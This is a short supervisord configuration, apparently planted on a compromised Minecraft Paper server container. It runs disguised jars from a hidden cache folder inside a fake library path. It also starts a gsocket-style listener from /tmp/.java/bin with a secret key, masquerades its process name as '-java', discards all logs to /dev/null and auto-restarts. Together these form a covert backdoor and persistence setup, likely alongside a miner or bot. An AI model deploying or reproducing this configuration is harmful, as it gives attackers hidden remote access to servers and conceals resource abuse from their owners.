[supervisord]
logfile=/dev/null

[program:app]
directory=/home/container/libraries/io/papermc/paper/paper-api/1.21.4-R0.1-SNAPSHOT/.cache
command=./paper-mods.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper-bot.jar -C ./conf.yaml 
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s cAeD2-a1E2c-5A16-f9L89-3D9g-8Hbj7-56C4a961-eCd9-F9440-d6A2803-8A1c-5J1g60 -liqD",HOME="/home/container"
command=exec -a -java ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true